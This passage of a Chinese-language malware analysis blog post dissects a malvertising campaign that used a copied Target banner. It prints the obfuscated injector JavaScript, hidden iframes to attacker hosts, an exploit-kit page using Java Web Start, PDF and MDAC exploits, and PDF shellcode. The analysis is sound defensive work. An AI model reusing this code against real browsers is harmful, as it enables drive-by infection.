%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%53%25%4C%4F%25%4C%53%63%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%57%4C%25%32%4C%48%57%4C%63%57%4C%6D%25%4C%43%25%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%48%4C%70%48%4C%42%70%4C%57%70%4C%5F%32%4C%70%57%4C%6D%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%53%25%4C%42%25%4C%53%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%53%25%4C%42%63%4C%53%25%4C%4F%32%4C%42%32%4C%70%57%4C%63%32%4C%43%32%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%78%53%4C';<br /><br />latency=reno1+reno2+reno3+reno4+reno5+reno6;<br /><br />latency=latency+reno7+reno8+reno9+reno10+reno11+reno12+reno13;<br /><br />latency=latency+reno14+reno15+reno16+reno17+reno18+reno19+reno20+reno21;<br /><br /><br /><br />latency=unescape(latency);<br /><br /><br /><br />var nerostrd=latency;<br /><br />var i=nerostrd.length;<br /><br />i=i-1;<br /><br />var jamdv='';<br /><br />for (var x = i; x >=0; x--)<br /><br />{<br /><br />jamdv=jamdv+nerostrd.charAt(x);<br /><br />}<br /><br />latency=jamdv;<br /><br /><br /><br />var plemoza="012345"+"6789abcde"+"fghijklmn"+"opqrstuvwx"+"yzABCDEFGHIJ"+"KLMNOPQ"+"RSTUVWXYZ/.:_-?&=%";<br /><br />var stroninfl="SP%cpH2W5C"+"83fEX:1r"+"jF9AQdM"+"lKi/sk4GuvtxJOB"+"m_U.Nq"+"zY7aw&nhgZo"+"VT=0IbRDye?6-L";<br /><br /><br /><br /><br /><br />var fallingms="";<br /><br />var rttcp;<br /><br />var ferrana;<br /><br />for(rttcp=0;rttcp<latency.length;rttcp++)<br /><br />{<br /><br />ferrana=stroninfl.indexOf(latency.charAt(rttcp));<br /><br />var konterrap=1-2;<br /><br />if(ferrana>konterrap)<br /><br />{<br /><br />fallingms+=plemoza.charAt(ferrana);<br /><br />}<br /><br />}<br /><br />eval(unescape(fallingms));<br /><br /></pre><br />上面這段混碼的javascript經過解碼後會得到:<br /><pre class="brush: js;"><br />statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);<br /><br /><br /><br />var all_t = "";<br /><br />var mtch = all_t.match(statictml);<br /><br /><br /><br />if ( mtch != null ) {<br /><br />document.write(unescape("%3Ciframe src='http://this.content.served.by.adshufffle.com/stats_t.php?id=1953243&s=0&e=1' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E"));<br /><br />} else {<br /><br />document.write(unescape("%3Ciframe src='http://colemuns.com/pupseg/show.php?key=92e93d0553cdb3c89d7d397457811f6d&u=root' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));<br /><br />document.write(unescape("%3Ciframe src='http://this.content.served.by.adshufffle.com/stats_js_e.php?id=1953243' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));<br /><br />}<br /><br /><br /><br />document.write('<iframe src="http://this.content.served.by.adshufffle.com/banners/flash-loader.php?src=http://this.content.served.by.adshufffle.com/bdb/aBigCommerce/target_gifrcard/10HolidayGiftCard_728x90.swf&w=728&h=90&url=http://ad.doubleclick.net/click;h=v8/3a6a/3/0/*/w;233305186;0-0;0;12910146;3454-728/90;39673254/39691041/1;;~aopt=2/1/7d/1;~sscs=?http%3A%2F%2Fwww.target.com%2FGiftCards%2Fb%3Fnode%3D14061591" width="728" height="90" scrolling="no" hspace="0" frameborder="0"></iframe>');<br /><br /></pre><br />在上面的這段script, colemuns.com/pubseg/show.php就是exploit所在。它也利用一個機制(在var statictml及all_t那段code)來檢查參訪者的時區,能讓它有能力依據不同的時區產生出特定的iframe,不過這一段在這次攻擊中似乎沒派上用場。<br /><br />http://this.content.served.by.adshufffle.com/bdb/aBigCommerce/target_gifrcard/10HolidayGiftCard_728x90.swf is the actual banner that gets displayed, which is copied from Target:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_hELDi5B8zOI/TQL70YXdPyI/AAAAAAAACJQ/jOmBWKq1WLs/s1600/bannertarget.png"><img id="BLOGGER_PHOTO_ID_5549274568186478370" style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://3.bp.blogspot.com/_hELDi5B8zOI/TQL70YXdPyI/AAAAAAAACJQ/jOmBWKq1WLs/s1600/bannertarget.png" border="0" /></a><br /><br />在這邊acerdse.com, blindry.com, careepi.com, and colemuns.com這幾個網域在正查後,都指到同一個IP位址91.213.217.194,用來交替使用來放置exploit的。 這個exploits的程式碼如下:<br /><pre class="brush: js;"><br /><html><body><div id="obj"></div><div id="pdf"></div><div id="java"></div><script>host = "h$$t$$tp:/$$$/$$co$$$l$$$$e$$$mun$$s$$.co$$m$$$/$$p$$u$$$p$$s$$$$e$$g$$"; host = host.replace(/[$]/g, ""); key = "92e93d0553cdb3c89d7d397457811f6d"; user = "root";</script><br /><br /> <applet code='main.class' archive='26dd43dcf27/105aac7339e.jar' width='255' height='136'><param name='game_id' VALUE='i//WgzzL5CmfpbXJL5fzWpWXmezq5jpfJWiWIq9Zh&hPHS:DmK9dwmdEvuQQELv#ELldvNvEdNkQNl==qnv:p9j55/'></applet><script>var iirduoa613057 = "_4044d626a1c";var aaxiubfm563272 = "_01ad045ecb0";var nizzuyweo160751 = "_93462cf8707";var feihoaejc896221 = "_aa4b7467bcb";var ev = 'yeegsgvsssaglh';/* aexzwfu263553 = 96; <ouafo10632> */var vuuyey275779 = "_aa398c568ba";var eurtpji70479 = "_c5fb02cb5f1";var dyeiya128404 = "_61d73e9a8f2";/* angfo215506 = 35; <vewoxiaiua264194> */var moiliauca38982161 = '223123 - 1213';this[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('var th = thi'+'s[\'ev\'+\'\'+\'al\'];');var moiliauca38229861 = '223123 - 1213';/* uxoexyk720677 = 80; <qrybyerce87643> */var eoegeoypam602661 = "_a05c49dbaf1";var uadviiio547663 = "_20bc608bd2a";qrsyuoihooa = 'QQQ\rQQQ\nQQQ QQQ QQQfQQQuQQQnQQQcQQQtQQQiQQQoQQQnQQQ QQQpQQQdQQQfQQQ_QQQiQQQeQQQ(QQQ)QQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQtQQQrQQQyQQQ{QQQ\rQQQ\nQQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQgQQQeQQQtQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQBQQQyQQQIQQQdQQQ(QQQ\"QQQoQQQbQQQjQQQ\"QQQ)QQQ.QQQiQQQnQQQnQQQeQQQrQQQHQQQTQQQMQQQLQQQ QQQ=QQQ QQQ\"QQQ<QQQOQQQBQQQJQQQEQQQCQQQTQQQ QQQiQQQdQQQ=QQQjQQQdQQQfQQQ1QQQ QQQhQQQeQQQiQQQgQQQhQQQtQQQ=QQQ0QQQ QQQwQQQiQQQdQQQtQQQhQQQ=QQQ0QQQ QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ=QQQcQQQlQQQsQQQiQQQdQQQ:QQQCQQQAQQQ8QQQAQQQ9QQQ7QQQ8QQQ0QQQ-QQQ2QQQ8QQQ0QQQDQQQ-QQQ1QQQ1QQQCQQQFQQQ-QQQAQQQ2QQQ4QQQDQQQ-QQQ4QQQ4QQQ4QQQ5QQQ5QQQ3QQQ5QQQ4QQQ0QQQ0QQQ0QQQ0QQQ>QQQ<QQQ/QQQOQQQBQQQJQQQEQQQCQQQTQQQ>QQQ\"QQQ;QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQjQQQdQQQfQQQ1QQQ.QQQGQQQeQQQtQQQVQQQeQQQrQQQsQQQiQQQoQQQnQQQsQQQ(QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ.QQQsQQQpQQQlQQQiQQQtQQQ(QQQ\"QQQ,QQQ\"QQQ)QQQ;QQQ\rQQQ\nQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ[QQQ1QQQ]QQQ.QQQsQQQpQQQlQQQiQQQtQQQ(QQQ\"QQQ=QQQ\"QQQ)QQQ;QQQ\rQQQ\nQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ[QQQ1QQQ]QQQ;QQQ\rQQQ\nQQQ QQQiQQQfQQQ QQQ(QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ7QQQ.QQQ1QQQ.QQQ4QQQ\"QQQ)QQQ QQQQQQQQQ QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ8QQQ.QQQ1QQQ.QQQ7QQQ\"QQQ)QQQ QQQQQQQQQ QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ9QQQ.QQQ2QQQ\"QQQ)QQQ)QQQ\rQQQ\nQQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQgQQQeQQQtQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQBQQQyQQQIQQQdQQQ(QQQ\"QQQpQQQdQQQfQQQ\"QQQ)QQQ.QQQiQQQnQQQnQQQeQQQrQQQHQQQTQQQMQQQLQQQ QQQ=QQQ QQQ\'QQQ<QQQiQQQfQQQrQQQaQQQmQQQeQQQ QQQsQQQrQQQcQQQ=QQQ\"QQQ2QQQ6QQQdQQQdQQQ4QQQ3QQQdQQQcQQQfQQQ2QQQ7QQQ/QQQ2QQQeQQQaQQQ0QQQbQQQbQQQbQQQ7QQQ7QQQ4QQQfQQQ.QQQpQQQhQQQpQQQ?QQQhQQQoQQQsQQQtQQQ=QQQ\'QQQ+QQQhQQQoQQQsQQQtQQQ+QQQ\'QQQ&QQQuQQQ=QQQ\'QQQ+QQQuQQQsQQQeQQQrQQQ+QQQ\'QQQ\"QQQ QQQwQQQiQQQdQQQtQQQhQQQ=QQQ\"QQQ1QQQ0QQQ0QQQ0QQQ\"QQQ QQQhQQQeQQQiQQQgQQQhQQQtQQQ=QQQ\"QQQ1QQQ0QQQ0QQQ0QQQ\"QQQ QQQfQQQrQQQaQQQmQQQeQQQbQQQoQQQrQQQdQQQeQQQrQQQ=QQQ\"QQQ1QQQ\"QQQ>QQQ<QQQ/QQQiQQQfQQQrQQQaQQQmQQQeQQQ>QQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ}QQQ QQQ\rQQQ\nQQQ QQQ}QQQ QQQcQQQaQQQtQQQcQQQhQQQ(QQQeQQQ)QQQ QQQ{QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQsQQQeQQQtQQQTQQQiQQQmQQQeQQQoQQQuQQQtQQQ(QQQpQQQdQQQfQQQ_QQQiQQQeQQQ,QQQ QQQ4QQQ0QQQ0QQQ0QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ\rQQQ\nQQQ\rQQQ\nQQQfQQQuQQQnQQQcQQQtQQQiQQQoQQQnQQQ QQQjQQQdQQQtQQQ(QQQ)QQQ\rQQQ\nQQQ{QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQuQQQ QQQ=QQQ QQQ\'QQQhQQQtQQQtQQQpQQQ:QQQ QQQ-QQQJQQQ-QQQjQQQaQQQrQQQ QQQ-QQQJQQQ\\QQQ\\QQQ\\QQQ\\QQQ1QQQ9QQQ5QQQ.QQQ5QQQ.QQQ1QQQ6QQQ1QQQ.QQQ1QQQ0QQQ\\QQQ\\QQQpQQQuQQQbQQQlQQQiQQQcQQQ\\QQQ\\QQQjQQQaQQQvQQQaQQQ.QQQjQQQaQQQrQQQ QQQ\'QQQ+QQQhQQQoQQQsQQQtQQQ+QQQ\'QQQ/QQQfQQQoQQQrQQQuQQQmQQQ.QQQpQQQhQQQpQQQ?QQQfQQQ=QQQSQQQMQQQBQQQ&QQQkQQQeQQQyQQQ=QQQ\'QQQ+QQQkQQQeQQQyQQQ+QQQ\'QQQ&QQQuQQQ=QQQ\'QQQ+QQQuQQQsQQQeQQQrQQQ+QQQ\'QQQ QQQnQQQoQQQnQQQeQQQ\'QQQ;QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQiQQQfQQQ QQQ(QQQwQQQiQQQnQQQdQQQoQQQwQQQ.QQQnQQQaQQQvQQQiQQQgQQQaQQQtQQQoQQQrQQQ.QQQaQQQpQQQpQQQNQQQaQQQmQQQeQQQ QQQ=QQQ=QQQ QQQ\'QQQMQQQiQQQcQQQrQQQoQQQsQQQoQQQfQQQtQQQ QQQIQQQnQQQtQQQeQQQrQQQnQQQeQQQtQQQ QQQEQQQxQQQpQQQlQQQoQQQrQQQeQQQrQQQ\'QQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ QQQ=QQQ QQQ\'QQQcQQQlQQQsQQQiQQQ\'QQQ+QQQ\'QQQdQQQ:QQQCQQQAQQQFQQQEQQQEQQQ\'QQQ+QQQ\'QQQFQQQAQQQCQQQ-QQQDQQQEQQQCQQQ\'QQQ+QQQ\'QQQ7QQQ-QQQ0QQQ0QQQ0QQQ\'QQQ+QQQ\'QQQ0QQQ\'QQQ+QQQ\'QQQ-QQQ0QQQ0QQQ0QQQ0QQQ-QQQAQQQBQQQCQQQ\'QQQ+QQQ\'QQQDQQQEQQQFQQQFQQQEQQQDQQQCQQQBQQQAQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ2QQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ2QQQ.QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ QQQ=QQQ QQQ\'QQQcQQQlQQQsQQQ\'QQQ+QQQ\'QQQiQQQdQQQ:QQQ8QQQAQQQDQQQ9QQQ\'QQQ+QQQ\'QQQCQQQ8QQQ4QQQ0QQQ-QQQ0QQQ4QQQ4QQQ\'QQQ+QQQ\'QQQEQQQ-QQQ1QQQ1QQQDQQQ1QQQ-QQQBQQQ\'QQQ+QQQ\'QQQ3QQQEQQQ9QQQ-QQQ0QQQ0QQQ8QQQ0QQQ5QQQ\'QQQ+QQQ\'QQQFQQQ4QQQ\'QQQ+QQQ\'QQQ9QQQ9QQQDQQQ9QQQ3QQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ2QQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQeQQQlQQQsQQQeQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQnQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQtQQQyQQQpQQQeQQQ QQQ=QQQ QQQ\'QQQaQQQ\'QQQ+QQQ\'QQQpQQQpQQQlQQQiQQQcQQQaQQQtQQQ\'QQQ+QQQ\'QQQiQQQoQQQnQQQ/QQQnQQQpQQQrQQQuQQQnQQQtQQQ\'QQQ+QQQ\'QQQiQQQmQQQeQQQ-QQQsQQQcQQQrQQQ\'QQQ+QQQ\'QQQiQQQpQQQtQQQaQQQbQQQlQQQeQQQ-QQQpQQQlQQQuQQQ\'QQQ+QQQ\'QQQgQQQiQQQnQQQ;QQQdQQQeQQQpQQQlQQQoQQQyQQQmQQQeQQQ\'QQQ+QQQ\'QQQnQQQtQQQtQQQoQQQoQQQ\'QQQ+QQQ\'QQQlQQQkQQQiQQQtQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQnQQQ.QQQtQQQyQQQpQQQeQQQ QQQ=QQQ QQQ\'QQQaQQQpQQQ\'QQQ+QQQ\'QQQpQQQlQQQiQQQcQQQaQQQtQQQiQQQ\'QQQ+QQQ\'QQQoQQQnQQQ/QQQjQQQaQQQvQQQaQQQ-QQQdQQQeQQQpQQQ\'QQQ+QQQ\'QQQlQQQoQQQyQQQmQQQeQQQnQQQ\'QQQ+QQQ\'QQQtQQQ-QQQtQQQoQQQoQQQlQQQ\'QQQ+QQQ\'QQQkQQQiQQQtQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQbQQQoQQQdQQQyQQQ.QQQaQQQpQQQpQQQeQQQnQQQdQQQCQQQhQQQiQQQlQQQdQQQ(QQQoQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQbQQQoQQQdQQQyQQQ.QQQaQQQpQQQpQQQeQQQnQQQdQQQCQQQhQQQiQQQlQQQdQQQ(QQQnQQQ)QQQ;QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ QQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQnQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ QQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ}QQQ\rQQQ\nQQQ\rQQQ\nQQQsQQQeQQQtQQQTQQQiQQQmQQQeQQQoQQQuQQQtQQQ(QQQjQQQdQQQtQQQ,QQQ QQQ3QQQ0QQQ0QQQ0QQQ)QQQ;QQQ\rQQQ\nQQQ\rQQQ\n';th("var bryoyiiayf = qrsyuoihooa.re"+"pla"+"ce(/[Q]/g,'');");var iqiav513852 = "_34a70f40656";/* bizpgyuaq305961 = 23; <exygu793510> */var eaiyaiaker752902 = "_c6b2a3a99fd";/* ziueaftwo749548 = 4; <gfihyc401172> *//* yauspgue593149 = 87; <faaynejeb207427> *//* oojqoi37339 = 71; <oieea506353> */var aykya290626 = "_76e3862ecd0";/* vouiiiiwl471445 = 97; <uaiih853631> */var oasxf283400 = "_ba13a57cbfd";/* eaojumj532053 = 3; <ehetan555132> */var oecryyamioy = 100;/* iezoiooe974360 = 10; <amolbyey364709> */var fasmeeiuyc847930 = "_08c893ddaac";/* yglyeazy825857 = 62; <xaoowyyv838265> */var iluieumjyu1486 = "_71331be6e91";var adoamiqpuei = '';/* dozjihey311662 = 80; <gewaeaoyu25937> *//* iuywiuy421415 = 53; <oiueuci618667> *//* eufec965915 = 38; <peluoue227579> */var aaouuu689519 = "_de3a4f69c12";/* mkilo920520 = 7; <azaeed813114> */ioyokeiueonu0 = bryoyiiayf;var ahxey783267 = "_f658c39a7d9";var iuouubei905581 = "_ed00bc42d89";var oliiur11273 = "_358c9003f99";/* yuhwaocuyy730219 = 58; <aogiupi451628> */var ylishbuy295077 = "_e8ff910a6f3";for(zeozuoutue=0;zeozuoutue<oecryyamioy;zeozuoutue++) {var kumoualvyo = 'function a1083435135(fa) {return fa;} var a506424832 = 991968621;function a486745355(fa) {return fa;} var a631530080 = 378464516;function a112875451(fa) {return fa;} var a1108616833 = 773453236;function a94842624(fa) {return fa;} var a973149738 = 1278431189;function a162114306(fa) {return fa;} var a18855745 = 716737348;function a699605006(fa) {return fa;} var a1049377591 = 1147700637;';var kumoualvyo = kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo;var kumoualvyo = kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo;var dsfsg = zeozuoutue+1;adoamiqpuei = 'var ioyokeiueonu'+dsfsg+'=ioyokeiueonu'+zeozuoutue+';'+kumoualvyo+''+kumoualvyo+''+kumoualvyo+'';th(adoamiqpuei);}th(ioyokeiueonu100);var yuuipiei717018 = "_4af7228fb04";/* uirofytouo523761 = 37; <egvdg176208> *//* nezqbovly381813 = 63; <adudbos234926> *//* teusoekl365197 = 71; <asrouyquig347789> */</script><br /><br /></pre><br />上面這段code解碼後如下:<br /><br /><img style="display:block; margin:0px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_2mGRgHlTZAA/TQi_q7UgO-I/AAAAAAAAACQ/89bqjkigHDI/s1600/codesnipped.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5550897284933237730" /><br /><br /><br />這邊我們可以看到它使用了三個exploits:<br />JDT: Java Web Start Arbitrary command-line injection (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886">CVE-2010-0886</a>)<br />Adobe Reader and Adobe Acrobat 9 GetIcon (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927">CVE-2009-0927</a>)<br />Microsoft MDAC RDS.Dataspace ActiveX (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">CVE-2006-0003</a>)<br /><br />還有些Exploit code是放在PDF檔案的內部http://colemuns.com/pupseg/26dd43dcf27/2ea0bbb774f.php?host=http://colemuns.com/pupseg&u=root<br /><br />將PDF中的Javascripts萃取出來內容如下:<br /><pre class="brush: js;"><br />//-------------------------------------------------------------<br /><br />//-----------------Do not edit the XML tags--------------------<br /><br />//-------------------------------------------------------------<br /><br /><br /><br />//<Document-Actions><br /><br />//<ACRO_source>Document Open</ACRO_source><br /><br />//<ACRO_script><br /><br />/*********** belongs to: Document-Actions:Document Open ***********/<br /><br />function ghfsdj(adbhsdh)<br /><br />{<br /><br /> var jfsd = "gas%ss2u";<br /><br /> return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);<br /><br />}<br /><br />shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C3E1&&EFD2&&C9C5&&8FC8&&CD80&&DFC3&&9F9B&&C394&&959F&&96C2&&9393&&C595&&C4C2&&C595&&9F9E&&91C2&&95C2&&919F&&9392&&9E91&&9797&&90C0&&80C2&&9BD3&&00A6");<br /><br />shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C3C8&&F6D1&&C7CA&&C3DF&&8FD4&&CD80&&DFC3&&9F9B&&C394&&959F&&96C2&&9393&&C595&&C4C2&&C595&&9F9E&&91C2&&95C2&&919F&&9392&&9E91&&9797&&90C0&&80C2&&9BD3&&00A6");<br /><br />shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&D4D6&&C8CF&&C0D2&&808F&&C3CD&&9BDF&&949F&&9FC3&&C295&&9396&&9593&&C2C5&&95C4&&9EC5&&C29F&&C291&&9F95&&9291&&9193&&979E&&C097&&C290&&D380&&A69B");<br /><br />shcode_collab = 